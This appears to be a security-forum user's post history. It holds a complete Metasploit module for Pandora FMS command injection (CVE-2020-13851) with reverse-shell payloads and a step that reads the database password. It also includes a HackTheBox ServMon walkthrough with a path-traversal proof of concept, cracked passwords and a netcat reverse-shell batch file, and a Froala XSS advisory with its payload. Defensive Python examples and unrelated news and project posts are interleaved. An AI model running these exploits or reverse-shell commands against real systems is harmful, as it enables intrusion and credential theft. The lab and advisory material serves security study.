Everything posted by Kev
-
This Metasploit module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the Events feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the target parameter in HTTP POST requests to the Events function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the target parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple grep command on the plaintext /var/www/html/pandora_console/include/config.php file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Pandora FMS Events Remote Command Execution',
        'Description' => %q{
          This module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions
          7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order
          to execute arbitrary commands. This module takes advantage of a command
          injection vulnerability in the `Events` feature of Pandora FMS. This flaw
          allows users to execute arbitrary commands via the `target` parameter in HTTP
          POST requests to the `Events` function. After authenticating to the target,
          the module attempts to exploit this flaw by issuing such an HTTP POST request,
          with the `target` parameter set to contain the payload. If a shell is obtained,
          the module will try to obtain the local MySQL database password via a simple
          `grep` command on the plaintext `/var/www/html/pandora_console/include/config.php`
          file. Valid credentials for a Pandora FMS account are required. The account
          does not need to have admin privileges. This module has been successfully
          tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual
          appliance ISO for this version).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Fernando Catoira', # Discovery
          'Julio Sanchez', # Discovery
          'Erik Wynter' # @wyntererik - Metasploit
        ],
        'References' => [
          ['CVE', '2020-13851'], # RCE via the `events` feature
          ['URL', 'https://www.coresecurity.com/core-labs/advisories/pandora-fms-community-multiple-vulnerabilities']
        ],
        'Platform' => ['linux', 'unix'],
        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
        'Targets' => [
          [
            'Linux (x86)',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'linux',
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux (x64)',
            {
              'Arch' => ARCH_X64,
              'Platform' => 'linux',
              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux (cmd)',
            {
              'Arch' => ARCH_CMD,
              'Platform' => 'unix',
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
            }
          ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2020-06-04',
        'DefaultTarget' => 1
      )
    )

    register_options [
      OptString.new('TARGETURI', [true, 'Base path to Pandora FMS', '/pandora_console/']),
      OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
      OptString.new('PASSWORD', [true, 'Password to authenticate with', 'pandora'])
    ]
  end

  def check
    vprint_status('Running check')
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'index.php')
    unless res
      return CheckCode::Unknown('Connection failed.')
    end
    unless res.code == 200 && res.body.include?('<title>Pandora FMS - the Flexible Monitoring System</title>')
      return CheckCode::Safe('Target is not a Pandora FMS application.')
    end
    @cookie = res.get_cookies
    html = res.get_html_document
    full_version = html.at('div[@id="ver_num"]')
    if full_version.blank?
      return CheckCode::Detected('Could not determine the Pandora FMS version.')
    end
    full_version = full_version.text
    version = full_version[1..-1].sub('NG', '')
    if version.blank?
      return CheckCode::Detected('Could not determine the Pandora FMS version.')
    end
    version = Gem::Version.new version
    unless version <= Gem::Version.new('7.0.744')
      return CheckCode::Safe("Target is Pandora FMS version #{full_version}.")
    end
    CheckCode::Appears("Target is Pandora FMS version #{full_version}.")
  end

  def login(user, pass)
    vprint_status "Authenticating as #{user} ..."
    res = send_request_cgi!({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'cookie' => @cookie,
      'vars_get' => { 'login' => '1' },
      'vars_post' => {
        'nick' => user,
        'pass' => pass,
        'login_button' => 'Login'
      }
    })
    unless res.code == 200 && res.body.include?('<b>Pandora FMS Overview</b>')
      fail_with Failure::NoAccess, 'Authentication failed'
    end
    print_good "Authenticated as user #{user}."
  end

  def on_new_session(client)
    super
    if target.arch.first == ARCH_CMD
      print_status('Trying to read the MySQL DB password from include/config.php. The default privileged user is `root`.')
      client.shell_write("grep dbpass include/config.php\n")
    else
      print_status('Tip: You can try to obtain the MySQL DB password via the shell command `grep dbpass include/config.php`. The default privileged user is `root`.')
    end
  end

  def execute_command(cmd, _opts = {})
    print_status('Executing payload...')
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'ajax.php'),
      'cookie' => @cookie,
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'Referer' => full_uri('index.php'),
      'vars_get' => {
        'sec' => 'eventos',
        'sec2' => 'operation/events/events'
      },
      'vars_post' => {
        'page' => 'include/ajax/events',
        'perform_event_response' => '10000000',
        'target' => cmd.to_s,
        'response_id' => '1'
      }
    }, 0) # the server will not send a response, so the module shouldn't wait for one
  end

  def exploit
    login(datastore['USERNAME'], datastore['PASSWORD'])
    if target.arch.first == ARCH_CMD
      execute_command payload.encoded
    else
      execute_cmdstager(background: true)
    end
  end
end

# 0day.today [2020-07-12] #
Source
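The bug the module above exploits is the classic one: the `target` value from the Events request is spliced into a command string and handed to a shell. As an added example (my code, not Pandora FMS's and not part of the module; all function names are hypothetical), here is the same pattern in Python with the vulnerable string-splicing form beside a hardened version that validates the value as an IP address or hostname and passes it to the process as its own argv element, so shell metacharacters never reach a shell.

```python
"""Command injection: vulnerable string splicing beside a hardened argv form.
Added example with hypothetical functions; not Pandora FMS or Metasploit code."""
import ipaddress
import re
import shlex
import subprocess

# RFC 1123 style hostname: dot-separated labels of letters, digits and hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_command(target):
    """The unsafe pattern: user input spliced into one shell string.
    Anything after ';', '|', '`' or '$(' becomes a second command."""
    return f"ping -c 1 {target}"


def is_valid_target(target):
    """Accept only an IPv4/IPv6 literal or a well-formed hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def safe_argv(target):
    """Hardened form: validate first, then pass the target as a separate argv
    element. No shell is involved, so metacharacters are inert."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return ["ping", "-c", "1", target]


def run_ping(target):
    """Execute with an argument list (shell=False) and return the exit status."""
    return subprocess.run(safe_argv(target), capture_output=True,
                          text=True, check=False).returncode


def shell_quoted(target):
    """If a shell string is unavoidable, quote the value. Shown for contrast;
    the argv list above remains the preferred fix."""
    return "ping -c 1 " + shlex.quote(target)


if __name__ == "__main__":
    injected = "127.0.0.1; id"  # constructed sample input
    print("vulnerable :", vulnerable_command(injected))
    print("quoted     :", shell_quoted(injected))
    print("valid?     :", is_valid_target(injected))
    print("argv       :", safe_argv("10.0.0.5"))
```

The validation step matters as much as the argv list: without it a hostname like `-c` could still be parsed by `ping` as an option, which is why the regex requires an alphanumeric first character.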
-
DarkOs

DarkOs, An Arch Based Distro | Status: Beta | Brought to you by: ybenel

Dark OS Is A Linux Operating System Based On Arch Linux, Designed To Create A More Enjoyable User Experience And Be Easy To Use. It Comes With 3 Editions (One Hell - Soopertrack - Schmedding); Each Edition Has Its Own Desktop / Window Manager And Package List.

DarkOs "One Hell" Edition Comes With The Plasma Desktop Environment And A Minimal Amount Of Packages.

DarkOs "Soopertrack" Edition Comes With No Desktop Or Window Manager But Uses LXDE As A Temporary Environment To Provide You With The Installer, And It'll Be Removed Once The Installation Is Finished. It Also Comes With No Essential Packages Such As (Browser, Text Editor, Terminal, etc.) So You'll Get To Choose What You Want.

DarkOs "Schmedding" Comes With No Desktop Or Window Manager Nor An Installer And Has No Packages So You Could Enjoy The Experience As If You Were Installing Arch Linux.

Features
- Minimal And Easy
- Gives You Full Control
- Customize What You Want
- Enjoy Using Linux
- Similar To Arch Linux (80%)
- Choose What's Perfect For You

Screenshot:

Download Source: https://sourceforge.net/projects/darkos-arch/
-
Earlier this week, Citrix released security updates for Citrix Application Delivery Controller (ADC), Citrix Gateway, and the Citrix SD-WAN WANOP appliance, and urged admins to apply them as soon as possible to reduce risk. At the time, there was no public attack code and no indication that any of the fixed flaws were getting actively exploited. On Thursday, though, SANS ISC’s Dr. Johannes Ullrich spotted attackers attempting to exploit two of the Citrix vulnerabilities on his F5 BigIP honeypot (set up to flag CVE-2020-5902 exploitation attempts).

About the vulnerabilities

The fixed flaws are 11 in total, ranging from information disclosure and DoS bugs to elevation of privilege, XSS and code injection flaws. He also pointed out that of the 11 vulnerabilities, there are six possible attack routes, and five of those have barriers to exploitation. Finally, he added that the vulnerabilities have no link to CVE-2019-19781, the remote code execution flaw that’s been heavily exploited by attackers since late December/early January.

About the recent exploitation attempts

Dr. Ullrich said that they are seeing some scans that are looking for systems that haven’t been patched yet. One of the exploited vulnerabilities allows arbitrary file downloads, the other allows retrieval of a PCI-DSS report without authentication.

Via helpnetsecurity.com
-
I haven't read the whole article, but I have a feeling that instead of beer, mici and mustard they'll be getting free internet; as for vulnerabilities, all the nephews will be voting.
-
ServMon retired today. ServMon is an easy-rated Windows machine on the HackTheBox platform. Its IP is 10.10.10.184. Feel free to check out my hackthebox profile yky4u. Respect me if I helped you. Let’s begin!

Enumeration

Let’s do an nmap scan on 10.10.10.184: -sC for default scripts, -sV for version detection, -p- for all ports.

[root@H0ST: ~/HTB/servmon]$ nmap -sC -sV -p- 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-19 12:15 BST
Nmap scan report for 10.10.10.184
Host is up (0.086s latency).
Not shown: 65517 closed ports
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp    open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
5666/tcp  open  tcpwrapped
6063/tcp  open  tcpwrapped
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=6/19%Time=5EEC9EC4%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=6/19%Time=5EEC9ECC%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\x12\x02\x18\0\x1aE\n\x07workers\x12\x0b\n\x04jobs\x12\x03\
SF:x18\xc0\x04\x12")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:
SF:\x2018\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1
SF:\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r
SF:(RTSPRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocum
SF:ent\x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Leng
SF:th:\x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 3m20s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-06-19T11:23:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 315.00 seconds

FTP allows anonymous login on port 21. We discovered two users and two interesting files. Let’s download them and see what they are.

Nadine — Confidential.txt

[root@H0ST: ~/HTB/servmon]$ cat Confidential.txt
Nathan,
I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.
Regards

Nathan — Notes to do.txt

[root@H0ST: ~/HTB/servmon]$ cat 'Notes to do.txt'
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

There is a web application, NVMS-1000, on port 80, which has a directory traversal vulnerability. The exploit can be found on exploit-db: NVMS-1000-Directory-Traversal. Let’s have a look at the exploit.

# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------
GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

Let’s try to retrieve files on Nathan’s Desktop using the directory traversal vulnerability. We found seven passwords in a file named Password.txt. Here are the passwords.

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

We need to find out the correct credentials. We can do it by using crackmapexec or hydra. The valid credentials are Nadine:L1k3B1gBut7s@W0rk. We are able to use those credentials to log in to SSH.

Privilege Escalation

The NSClient++ web application is running on port 8443. Run the command to obtain the password. Let’s route the traffic from 10.10.10.184:8443 to 127.0.0.1:8443 using SSH.

ssh -L 8443:127.0.0.1:8443 Nadine@10.10.10.184

We browsed to http://127.0.0.1:8443 and we can see the web application prompt for a password; enter ew2x6SsGTxjRwXOT to log in to the application. We can use the NSClient++ 0.5.2.35 — Privilege Escalation exploit. Take a look at what it is:

Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: NSClient++ 0.5.2.35 - Privilege Escalation
Date: 05-05-19
Vulnerable Software: NSClient++ 0.5.2.35
Vendor Homepage: http://nsclient.org/
Version: 0.5.2.35
Software Link: http://nsclient.org/download/
Tested on: Windows 10 x64

Details:
When NSClient++ is installed with Web Server enabled, local low privilege users have the ability to read the web administrator's password in cleartext from the configuration file. From here a user is able to login to the web server and make changes to the configuration file that is normally restricted. The user is able to enable the modules to check external scripts and schedule those scripts to run. There doesn't seem to be restrictions on where the scripts are called from, so the user can create the script anywhere. Since the NSClient++ Service runs as Local System, these scheduled scripts run as that user and the low privilege user can gain privilege escalation. A reboot, as far as I can tell, is required to reload and read the changes to the web config.

Prerequisites:
To successfully exploit this vulnerability, an attacker must already have local access to a system running NSClient++ with Web Server enabled using a low privileged user account with the ability to reboot the system.

Exploit:
1. Grab web administrator password
- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password
C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine
@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine
nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings
- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat

6. Add schedule to call script every 1 minute and save settings
- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine
nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

Risk:
The vulnerability allows local attackers to escalate privileges and execute arbitrary code as Local System

Check the version of NSClient++ by running nscp test. We can confirm it is vulnerable. Let’s create evil.bat and put it in the C:\Temp directory.

[root@H0ST: ~/HTB/servmon]$ cat evil.bat
@echo off
c:\temp\nc.exe 10.10.14.23 4444 -e cmd.exe

Download evil.bat and nc.exe to the box using PowerShell. Go to Scripts, put c:\temp\evil.bat into the Value field to create a script to run evil.bat. Go to Scheduler, and set the Value to interval = 1m. Listen on port 4444. Click Control, and click the Reload button. We have a reverse shell as nt authority\system now.

Source
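The NVMS-1000 traversal in the writeup above works because the server joins the requested path onto its document root without checking where the result ends up. As an added example (my code, not the writeup's, not NVMS's; the document root and log lines are constructed), here is the resolution check a web server should perform, followed by the same check run over access-log lines so the attempts stand out. It goes a little beyond the writeup by also handling URL-encoded and double-encoded dots and Windows backslashes.

```python
"""Directory traversal: safe path resolution under a document root, and the
same check applied to web server access-log lines.
Added example; the document root and the log lines are constructed."""
import posixpath
import re
from urllib.parse import unquote

DOC_ROOT = "/srv/nvms/www"  # assumed document root, not NVMS-1000's real path

# Common Log Format: client, ident, user, [time], "METHOD path PROTO", status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def resolve_under_root(root, request_path):
    """Return the absolute file path if it stays under root, else None.

    Decoding twice defeats double-encoded dots (%252e), backslashes are
    normalised because the NVMS host is Windows, and the *resolved* path is
    compared against the root so '..' sequences cannot climb out of it."""
    decoded = request_path
    for _ in range(2):
        decoded = unquote(decoded)
    decoded = decoded.replace("\\", "/")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def flag_traversal(log_lines, root=DOC_ROOT):
    """Apply the same resolution to each logged request; a path that would
    escape the root is a traversal attempt worth alerting on."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, path, status = m.groups()
        if resolve_under_root(root, path) is None:
            hits.append((client, path, int(status)))
    return hits


# Constructed sample log: two benign requests and two traversal attempts.
SAMPLE_LOG = """\
10.10.14.23 - - [19/Jun/2020:12:20:01 +0100] "GET /Pages/login.htm HTTP/1.1" 200 340
10.10.14.23 - - [19/Jun/2020:12:21:07 +0100] "GET /../../../../../../windows/win.ini HTTP/1.1" 200 92
10.10.14.23 - - [19/Jun/2020:12:21:09 +0100] "GET /%2e%2e/%2e%2e/%2e%2e/Users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 181
10.10.14.23 - - [19/Jun/2020:12:22:30 +0100] "GET /images/logo.png HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for client, path, status in flag_traversal(SAMPLE_LOG.splitlines()):
        print(f"traversal attempt from {client}: {path} (status {status})")
```

A status of 200 on a flagged line is the signal that matters: the server did not just see the attempt, it served the file.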
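The NSClient++ chain above leaves a footprint in nsclient.ini: the web server module on, a password stored in the file, CheckExternalScripts and Scheduler enabled, a script entry pointing outside the install tree, and a schedule that runs it. As an added example (my code, not NSClient++'s and not the exploit author's), here is an audit that parses a constructed ini and reports exactly that chain. The section and key names follow the settings the exploit text names (External Scripts > Scripts, Scheduler > Schedules, the web password), but the ini layout is assumed rather than copied from a real install.

```python
"""Audit an NSClient++ style ini for the external-script / scheduler chain.
Added example; the ini content and section layout are constructed/assumed."""
import configparser
import ntpath

INSTALL_DIR = r"C:\Program Files\NSClient++"   # assumed install location

# Constructed sample, shaped like the settings the exploit text walks through.
SAMPLE_INI = r"""
[/modules]
WEBServer = enabled
CheckExternalScripts = enabled
Scheduler = enabled

[/settings/default]
password = SoSecret
allowed hosts = 127.0.0.1

[/settings/external scripts/scripts]
foobar = c:\temp\evil.bat
check_disk = scripts\check_disk.bat

[/settings/scheduler/schedules/foobar]
interval = 1m
command = foobar
"""


def _executable_of(command):
    """First token of a command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    parts = command.split()
    return parts[0] if parts else command


def audit_nsclient(ini_text, install_dir=INSTALL_DIR):
    """Return a list of findings describing the privilege-escalation chain."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    findings = []

    modules = dict(cp["/modules"]) if cp.has_section("/modules") else {}
    enabled = {k for k, v in modules.items() if v.strip().lower() == "enabled"}

    # 1. Web admin password at rest in a file low-privileged users can read.
    if "webserver" in enabled and cp.get("/settings/default", "password", fallback=""):
        findings.append("web admin password stored in cleartext ini while WEBServer is enabled")

    # 2. External scripts that live outside the install tree (e.g. c:\temp).
    root = ntpath.normpath(install_dir).lower() + "\\"
    outside = {}
    scripts_section = "/settings/external scripts/scripts"
    scripts = dict(cp[scripts_section]) if cp.has_section(scripts_section) else {}
    for name, command in scripts.items():
        exe = _executable_of(command)
        full = ntpath.normpath(exe if ntpath.isabs(exe) else ntpath.join(install_dir, exe))
        if not full.lower().startswith(root):
            outside[name] = full
            findings.append(f"external script '{name}' runs {full}, outside the install directory")

    # 3. Schedules that execute one of those scripts under the service account.
    if "scheduler" in enabled:
        for section in cp.sections():
            if not section.startswith("/settings/scheduler/schedules/"):
                continue
            command = cp.get(section, "command", fallback="").strip()
            if command in outside:
                name = section.rsplit("/", 1)[1]
                interval = cp.get(section, "interval", fallback="?")
                findings.append(f"schedule '{name}' runs '{command}' every {interval} as the service account")
    return findings


if __name__ == "__main__":
    for finding in audit_nsclient(SAMPLE_INI):
        print("-", finding)
```

A clean ini yields an empty list; the three findings together are the whole chain, and the second one alone (a script outside the install tree) is the line most worth alerting on.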
-
PatternAnalyzer

The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use. This project was created for the "Security of wireless and mobile network communications" class of 2019, ICSD Department, University of the Aegean.

Download Source
-
Froala WYSIWYG HTML Editor 3.1.1 Cross Site Scripting Vulnerability
Kev posted a topic in Exploituri
#############################################################
#
# Product:  Froala WYSIWYG HTML Editor
# Vendor:   Froala
# CSNC ID:  CSNC-2020-004
# CVE ID:   CVE-2019-19935
# Subject:  DOM XSS in Froala WYSIWYG HTML Editor
# Severity: Medium
# Effect:   Remotely exploitable
# Author:   Emanuel Duss <emanuel.duss@compass-security.com>
# Date:     2020-07-01
#
#############################################################

Introduction
------------

Froala WYSIWYG HTML Editor is a lightweight WYSIWYG HTML Editor written in JavaScript that enables rich text editing capabilities for web applications [1]. Froala sanitizes the user input in order to prevent cross-site scripting attacks [2].

During a web application penetration test, Compass found a DOM-based cross-site scripting (XSS) [3] in the Froala WYSIWYG HTML Editor. HTML code in the editor is not correctly sanitized when inserted into the DOM. This allows an attacker that can control the editor content to execute arbitrary JavaScript in the context of the victim's session.

Affected
--------

* All versions of the Froala WYSIWYG HTML Editor

The issue was found in December 2019 in version 3.0.6 and was still not fixed in July 2020 in version 3.1.1.

Technical Summary
-----------------

It's possible to perform DOM based XSS in the Froala editor by inserting the `<iframe>` tag and the `srcdoc` attribute into the editor:

<iframe srcdoc="<img src=x onerror=alert(document.domain)>"></iframe>

This can be verified by inserting the payload into the "Code View" of the editor. In this case, this would be a self-XSS because the users would only attack themselves. However, it could be possible that untrusted data from a non-controlled source is loaded into the editor in order to exploit it. An example could be a web application where multiple users can edit the same content using this editor.

An attacker can use this to execute their own JavaScript code in the session of the victim. This can be abused to read the content of the victim's account, use the session to make further requests to the web application or read the cookies or web storage.

Technical Details
-----------------

# Correct Behavior

According to the Froala tech support page "Why is the <script> tag being removed?", the `<script>` tag is removed in order to prevent possible XSS attacks [2]. Other XSS payloads that use other HTML tags and event handlers are also removed from the DOM before they are inserted.

This can be verified using a PoC hosted on `poc.example.net` that inserts potentially untrusted data with a `<script>` tag into the editor:

<link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/3.0.6/css/froala_style.min.css" rel="stylesheet" type="text/css" />
